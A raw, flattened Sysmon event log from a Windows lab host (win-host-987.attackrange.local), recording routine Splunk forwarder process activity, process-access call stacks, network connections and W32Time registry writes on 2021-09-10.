354300x800000000000000035341480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:28.167{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52309-false10.0.1.12-8000- 23542300x800000000000000035341479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:02.221{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D71C57682245338050DB0AF80DE5F290,SHA256=488146C96890B62BD2D98B75E4E77C22293895BECE7CC5B5A8859BCC2B14C14A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:03.255{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB9161173C803DF31F5330BF31229266,SHA256=31340B1B46792FEE326416916562F06433F5E03328AB17E1D6112B12118EE368,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341499Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.785{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-71C8-613B-10B4-03000000C801}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341498Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.785{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341497Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.785{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341496Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.785{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341495Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.785{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341494Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.785{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-71C8-613B-10B4-03000000C801}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341493Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.785{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-71C8-613B-10B4-03000000C801}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341492Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.771{B81B27B7-71C8-613B-10B4-03000000C801}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035341491Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.286{B81B27B7-71C8-613B-0FB4-03000000C801}24646724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035341490Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.255{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1752CB3217DD84E16A79D3EB04138AA8,SHA256=C0EBB18C5B31A1D890587D42D40B389DFCD72241EDBF46F589A44DA183F8FFFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341489Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.086{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-71C8-613B-0FB4-03000000C801}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341488Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.070{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-71C8-613B-0FB4-03000000C801}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341487Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.070{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341486Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.070{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.070{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341484Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.070{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341483Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.070{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-71C8-613B-0FB4-03000000C801}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341482Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:04.055{B81B27B7-71C8-613B-0FB4-03000000C801}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035341502Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:05.269{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F0D2C4EC22ADD2919EBC4764FD5FA5A,SHA256=77A8D782D51C7693FE6D6D4D5A44064C82871EB8F8C3F5F5B3B954BAC2B58527,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341501Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:05.069{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=466D9E340C91539D4F7327B7822EAC05,SHA256=AB3C7FDDB42E06D6285329C24BA3A090EBFE9C47488E69EBBB2E1B72D801EA79,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341500Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:05.069{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AAD225AF1AB8E7D8BCE73547B5E6CB91,SHA256=03B0777EA34A46024A1CF193C4F4EA96BA90B4E78F37FCED9D2CEBA9BD71B313,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341503Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:06.318{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBEE629B094CEFE0A47588D3817DACE8,SHA256=CBC8F907D03FC30F82D3F94905FA5B6177984846E6CF1A174EEB082A67D09EAD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341505Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:07.583{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3EAE0D208D57AC7F5B278E71C4754120,SHA256=5A86E1266992AAF103C3B199272019B7151F4378DD6B4DCD1AEB89FB1D0753DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341504Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:07.352{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF77486202B2BCC267372944C7935935,SHA256=25F633C85F6AA83284C42380F96BFFA62B7F277746FE40DAC6F1E9D9614D0CAB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341507Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:08.383{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6B6D9BDC7A31D5590CFBD3F5B6D6D83,SHA256=A38B4846BD13665A9D146598A7AA5CFB9FE7BACB96E27A0A0B78568E16728B1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341506Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:33.480{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52310-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341509Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:09.417{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7B2127D34C2285CD7E8E9C2AC7BCCB4,SHA256=BA2C5997607466AE5A08CF1886A6FA239A461240B2C8109C3DDD8F3F7FC99AFF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341508Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:34.094{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52311-false10.0.1.12-8000- 23542300x800000000000000035341510Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:10.482{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F6FBBB8C8D0903707C0287D96D5C8F9,SHA256=954B6032DC0741F4DC4A3C8D483397E049DE93D859C516F619C7F3173275A045,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341521Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:11.518{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EFA96CAA31984AF9C711354C16C5184,SHA256=3C116991A6D544D6EB0F31EA9A4A0CE7E3755CFA818C4A9DD9D1B32AB1B9F740,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035341520Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 14:55:11.335{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000035341519Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 14:55:11.335{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x75f2c38e) 13241300x800000000000000035341518Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 14:55:11.335{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a64b-0x79186d05) 13241300x800000000000000035341517Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 14:55:11.335{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a653-0xdadcd505) 13241300x800000000000000035341516Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 14:55:11.335{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a65c-0x3ca13d05) 13241300x800000000000000035341515Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 14:55:11.335{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000035341514Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 14:55:11.335{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x75f2c38e) 13241300x800000000000000035341513Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 14:55:11.335{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a64b-0x79186d05) 13241300x800000000000000035341512Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 